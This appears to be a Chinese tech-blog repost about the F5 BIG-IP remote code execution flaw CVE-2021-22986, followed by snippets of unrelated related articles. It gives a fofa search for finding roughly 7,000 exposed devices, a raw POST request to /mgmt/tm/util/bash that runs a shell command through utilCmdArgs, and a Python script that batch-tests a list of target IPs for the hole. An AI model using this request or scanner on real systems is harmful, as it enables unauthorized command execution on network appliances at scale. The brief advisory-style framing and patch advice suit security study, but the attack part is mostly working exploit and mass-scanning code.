F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

2024-02-23 04:58

本文主要是介绍F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

一:漏洞描述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台,,F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。

二: 漏洞影响

F5 BIG-IP 16.x: 16.1.0.3
F5 BIG-IP 15.x: 15.1.0.4
F5 BIG-IP 14.x: 14.1.2.6
F5 BIG-IP 13.x: 13.1.3.4
F5 BIG-IP 12.x: 12.1.5.2
F5 BIG-IP 11.x: 11.6.5.2

三: 漏洞复现

通过fofa(会员才能使用该搜索方法)语句搜索icon_hash:-335242539(下篇文章来写通过icon_hash来定位真实的IP地址),搜索出将近7000条,fofa还是很强大的。在这里插入图片描述
随便访问一个url,登陆页面如下:
在这里插入图片描述
poc如下:该漏洞通过utilCmdArgs参数执行命令。

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json{"command":"run","utilCmdArgs":"-c id"}

响应包为:
在这里插入图片描述
四: 漏洞批量检测POC,将ip.txt放入同级目录即可。

import requests
import sys
import random
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def poc():with open(r"ip.txt", "r", encoding='utf8') as scan_url:for url in scan_url:if url[:4] != "http":url = "https://" + urlurl = url.strip('\n')vun_url=url + "/mgmt/tm/util/bash"headers={"Authorization": "Basic YWRtaW46QVNhc1M=","X-F5-Auth-Token": "","Content-Type": "application/json"}data='{"command":"run","utilCmdArgs":"-c id"}'try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response=requests.post(url=vun_url,headers=headers,data=data,verify=False,timeout=2)if "commandResult" in response.text and response.status_code ==200:print("目标{}存在漏洞,响应为{}".format(url,json.loads(response.text)["commandResult"]))else:print("目标{}不存在漏洞".format(url))except Exception as e:print("目标{}请求失败".format(url))if __name__ == '__main__':poc()

检测效果如下:
在这里插入图片描述

五: 修复方法:

官方已发布上述漏洞的安全更新,建议受影响用户尽快升级到安全版本。

参考连接:
https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ
https://mp.weixin.qq.com/s/lyrVwgSnu0iSehVr3lZiRw
https://mp.weixin.qq.com/s/NFNdr_0_6G0Zd65BvfNA-w

这篇关于F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/737583

相关文章

2024.9.8 TCP/IP协议学习笔记

1.所谓的层就是数据交换的深度,电脑点对点就是单层,物理层,加上集线器还是物理层,加上交换机就变成链路层了,有地址表,路由器就到了第三层网络层,每个端口都有一个mac地址 2.A 给 C 发数据包,怎么知道是否要通过路由器转发呢?答案:子网 3.将源 IP 与目的 IP 分别同这个子网掩码进行与运算****,相等则是在一个子网,不相等就是在不同子网 4.A 如何知道,哪个设备是路由器?答案:在 A

GPU 计算 CMPS224 2021 学习笔记 02

并行类型 (1)任务并行 (2)数据并行 CPU & GPU CPU和GPU拥有相互独立的内存空间,需要在两者之间相互传输数据。 (1)分配GPU内存 (2)将CPU上的数据复制到GPU上 (3)在GPU上对数据进行计算操作 (4)将计算结果从GPU复制到CPU上 (5)释放GPU内存 CUDA内存管理API (1)分配内存 cudaErro

远程工具-SecureCRT/SecureFX

下载地址: https://www.portablesoft.org/securecrt-securefx-integrated/

【微服务】Ribbon(负载均衡,服务调用)+ OpenFeign(服务发现,远程调用)【详解】

文章目录 1.Ribbon(负载均衡,服务调用)1.1问题引出1.2 Ribbon负载均衡1.3 RestTemplate整合Ribbon1.4 指定Ribbon负载均衡策略1.4.1 配置文件1.4.2 配置类1.4.3 定义Ribbon客户端配置1.4.4 自定义负载均衡策略 2.OpenFeign面向接口的服务调用(服务发现,远程调用)2.1 OpenFeign的使用2.1 .1创建

2021-8-14 react笔记-2 创建组件 基本用法

1、目录解析 public中的index.html为入口文件 src目录中文件很乱,先整理文件夹。 新建components 放组件 新建assets放资源   ->/images      ->/css 把乱的文件放进去  修改App.js 根组件和index.js入口文件中的引入路径 2、新建组件 在components文件夹中新建[Name].js文件 //组件名首字母大写

2021-08-14 react笔记-1 安装、环境搭建、创建项目

1、环境 1、安装nodejs 2.安装react脚手架工具 //  cnpm install -g create-react-app 全局安装 2、创建项目 create-react-app [项目名称] 3、运行项目 npm strat  //cd到项目文件夹    进入这个页面  代表运行成功  4、打包 npm run build

linux下查看自己的外网ip

局域网的服务器是通过ADSL路由器连接外网的,但ADSL是从ISP运营商那儿通过动态获得IP的,那么我怎么知道自己的外网地址是多少呢? 今天得到几个办法: curl -s http://whatismyip.org wget http://whatismyip.org 然后再  cat index.html 也可以看到

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

如何删除不小心上传到git远程仓库中的.idea .iml文件

如果在开始的时候不配置,gitignore文件或者文件配置不正确,初始化上传的时候就会有一些不必要的信息上传上去 如果已经存在了一些文件在git远程仓库中,如。idea,.iml文件等。 首先在项目中定义一个  .gitignore文件,简单的实例如下也可以用idea中的gitignore插件 .DS_Storeclasses/*.settings/target/.classpath

Docker远程连接和Docker Remote Api

在Docker生态系统中一共有3种API:Registry API、Docker Hub API、Docker Remote API 这三种API都是RESTful风格的。这里Remote API是通过程序与Docker进行集成和交互的核心内容。 Docker Remote API是由Docker守护进程提供的。默认情况下,Docker守护进程会绑定到一个所在宿主机的套接字:unix:///v